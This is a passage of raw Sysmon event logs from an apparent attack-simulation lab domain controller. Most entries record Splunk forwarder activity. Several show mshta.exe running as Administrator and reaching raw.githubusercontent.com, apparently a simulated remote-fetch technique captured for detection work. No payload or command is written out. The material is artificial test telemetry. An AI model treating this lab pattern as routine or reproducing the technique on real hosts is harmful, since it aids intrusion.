14:08:05.221{5ABCFE62-843F-603E-2C00-00000000AD01}17643136C:\Windows\sysmon64.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000002203647Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.271{00000000-0000-0000-0000-000000000000}3816raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.108.133;::ffff:185.199.111.133;<unknown process> 354300x80000000000000002203646Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.752{00000000-0000-0000-0000-000000000000}2808<unknown process>-tcptruefalse10.0.1.14win-dc-228.attackrange.local60712-false185.199.109.133cdn-185-199-109-133.github.com443https 354300x80000000000000002203645Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.257{00000000-0000-0000-0000-000000000000}4764<unknown process>-tcptruefalse10.0.1.14win-dc-228.attackrange.local60711-false185.199.109.133cdn-185-199-109-133.github.com443https 23542300x80000000000000002203660Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:06.955{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203659Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:06.518{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=31A640D8C1449879F154A9DF71143379,SHA256=0613C327D9B95F0BBED0F0D1A815C052E4E91DEC094763762C509C9BA7567A7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203658Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:06.346{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CBD7B2D59C91E384623B2D121014CCD,SHA256=07865B5ED097D12E92A24052DD768F867242F5EF3DB0B9B7095E45E8348C34B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203657Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.268{00000000-0000-0000-0000-000000000000}3816<unknown process>-tcptruefalse10.0.1.14win-dc-228.attackrange.local60714-false185.199.109.133cdn-185-199-109-133.github.com443https 23542300x80000000000000002203665Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:07.955{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B95837C0E6E3588C77215A1D4B6C8614,SHA256=D7C85929E736576211DA3C297D5662C992A11DD593ED56AEA1BD7EE5E8FFC481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203664Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:07.346{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AA91187B1058EDC5AF05DD9BFA2AFC2,SHA256=F3FB4E52519404188A9B95BD55E6E4FA201E7F4BE0043E09AEBE69CBBE6FBC9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203663Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.853{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-228.attackrange.local60715-false185.199.109.133cdn-185-199-109-133.github.com443https 10341000x80000000000000002203662Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:07.127{5ABCFE62-843F-603E-2C00-00000000AD01}17643124C:\Windows\sysmon64.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ntdll.dll+6cdaa|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203661Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:07.127{5ABCFE62-843F-603E-2C00-00000000AD01}17643124C:\Windows\sysmon64.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203666Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:08.362{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=412B6BCB2213BA3408AD26A929496E3D,SHA256=4B54D40D723A48D28FAC6595D00C77EEEFE3BCF880AB3517A91E6F8B7D1FC88E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203670Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:05.917{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60717-false10.0.1.12-8000- 354300x80000000000000002203669Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:04.776{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60716-false10.0.1.12-8089- 23542300x80000000000000002203668Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:09.408{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7BD5E10B31AF08370E3097648BEAF62,SHA256=AF8BD9FFD56A525BF42A90C9D1487F5AAD0A29B677A674BB7432DE814F1674CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203667Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:09.237{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7AB0BBCA4EC1901C85C8ACFB98F2A5A,SHA256=C98C17CB90C6395379AAD5633E0535D8070028691ED31D4843522A2A3AFC5A9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203671Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:10.409{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77A8DA008CFC315973047944791DF784,SHA256=8CFE5101CFD0F2EACB02C699CC0BC86D15DD4B11E9643173B72BFF4F562D8EFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203672Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:11.643{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B9A554998C9EF08BEC2AFEE1B678117,SHA256=87312739F9772DCB85210C36FAF7A9B8EE2059AA1CF85AD063C492E8B46911E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203673Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:12.815{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02F27D1F9DE50948715D13CC065CBD79,SHA256=3D3943B61ECE1B20B1012744027DDA608445CF7E5FF9948941F47756D2C2CCBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203674Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:13.815{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DA70A390F1E57FF5F6823B31DFCD3C2,SHA256=B56B0FE91F19FC13318726CAD3FA69526333217F1DDC6CA255E9CAD46070EA1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203678Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:14.955{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BF22465DBDED7DC1A8910AE329BF178,SHA256=3391239430A45E89025D76D134A9C66A9BC5B14C440C98D1D6570BCFDF378F29,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203677Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:10.948{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60718-false10.0.1.12-8000- 23542300x80000000000000002203676Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:14.237{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4259708FA3B3CFF18163201525C12DD,SHA256=2F52081B76B992534643F8C28F239CE7F9E1110C86EDC1798D7EA9F68B841DFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203675Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:14.237{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9F6E732BB9F2E2B477F99E6FBD0FD7CB,SHA256=63DA3293B23DB8DDEE066C54510B4D5130BE02383BABA47BF84679E9207344AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203681Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:15.971{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BB4968848D4DAC2FC2CB44E150919C7,SHA256=1562C330E8E380D9AD33CF1434940D548C3D0B20F12EA8B75921E3867BEC1C4C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203680Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:11.496{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60719-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local135epmap 354300x80000000000000002203679Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:11.496{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60719-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local135epmap 23542300x80000000000000002203682Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:16.752{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4259708FA3B3CFF18163201525C12DD,SHA256=2F52081B76B992534643F8C28F239CE7F9E1110C86EDC1798D7EA9F68B841DFB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203691Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:17.612{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E9D1-6040-564E-00000000AD01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203690Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:17.612{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203689Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:17.612{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203688Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:17.612{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203687Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:17.612{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203686Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:17.612{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E9D1-6040-564E-00000000AD01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203685Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:17.612{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E9D1-6040-564E-00000000AD01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203684Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:17.487{5ABCFE62-E9D1-6040-564E-00000000AD01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203683Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:17.002{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31D21A7630A601DCB177650B6C0D583B,SHA256=285034C119171549ED5EA5EC6A713224DEE2AF75D709C26B8D5320CA1AAD58DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203702Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:18.721{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED094EE59A570E42BE31C09B878B9EBD,SHA256=2B4BA3BB420353E898FB5ECEE41AF18E666B23B47282F14FA08B8C47326B2F0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203701Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:18.518{5ABCFE62-E9D2-6040-574E-00000000AD01}5740864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203700Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:18.393{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E9D2-6040-574E-00000000AD01}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203699Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:18.393{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203698Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 